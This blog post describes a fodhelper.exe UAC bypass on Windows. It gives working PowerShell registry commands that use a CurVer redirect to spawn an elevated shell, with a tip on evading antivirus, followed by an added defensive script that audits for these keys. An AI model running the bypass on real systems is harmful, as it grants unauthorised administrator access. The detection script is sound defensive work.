Exploiting the Windows “Feature on Demand” Helper

author: Nathan Acks
date: 2022-09-02

The fodhelper binary can be abused to gain an admin shell on Windows boxes with a couple of registry key changes. The key (heh) here is to use the CurVer registry key to point fodhelper.exe to a different registry location; otherwise most AV solutions will catch this change and block it (though sometimes the command will still execute).

# Handler command stored under a separate class key (.pwn)
New-Item "HKCU:\Software\Classes\.pwn\Shell\Open\command" -Force
Set-ItemProperty "HKCU:\Software\Classes\.pwn\Shell\Open\command" `
	-Name "(default)" -Value "cmd.exe /c start powershell.exe" -Force
# CurVer on the ms-settings class points at that key
New-Item -Path "HKCU:\Software\Classes\ms-settings\CurVer" -Force
Set-ItemProperty "HKCU:\Software\Classes\ms-settings\CurVer" `
	-Name "(default)" -Value ".pwn" -Force
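
From the defender's side, the same keys are what to audit. The following is an added example, not part of the original note: it checks the current user's hive for an ms-settings handler override, including the CurVer redirection used above. The function names `Get-RegDefaultValue` and `Test-MsSettingsOverride` are hypothetical, and it assumes a per-user ms-settings class key is not expected on the host.

```powershell
# Added example: audit HKCU for the ms-settings override described above.
# Function names are hypothetical; run as the user whose hive is being checked.

function Get-RegDefaultValue {
    param([Parameter(Mandatory)][string]$Path)
    # Returns the key's (default) value, or $null if the key does not exist.
    $key = Get-Item -LiteralPath $Path -ErrorAction SilentlyContinue
    if ($null -eq $key) { return $null }
    return $key.GetValue('')
}

function Test-MsSettingsOverride {
    $classes  = 'HKCU:\Software\Classes'
    $findings = @()

    # Case 1: handler command written directly under ms-settings.
    $directKey = "$classes\ms-settings\Shell\Open\command"
    $direct    = Get-RegDefaultValue -Path $directKey
    if ($direct) {
        $findings += [pscustomobject]@{
            Type = 'DirectCommand'; Key = $directKey; Value = $direct
        }
    }

    # Case 2: CurVer redirects ms-settings to another class key.
    $curVerKey = "$classes\ms-settings\CurVer"
    $curVer    = Get-RegDefaultValue -Path $curVerKey
    if ($curVer) {
        $findings += [pscustomobject]@{
            Type = 'CurVerRedirect'; Key = $curVerKey; Value = $curVer
        }
        # Follow the redirection and report the command it resolves to.
        $targetKey = "$classes\$curVer\Shell\Open\command"
        $target    = Get-RegDefaultValue -Path $targetKey
        if ($target) {
            $findings += [pscustomobject]@{
                Type = 'RedirectedCommand'; Key = $targetKey; Value = $target
            }
        }
    }
    return $findings
}

# No output means neither override is present in this user's hive.
Test-MsSettingsOverride | Format-List
```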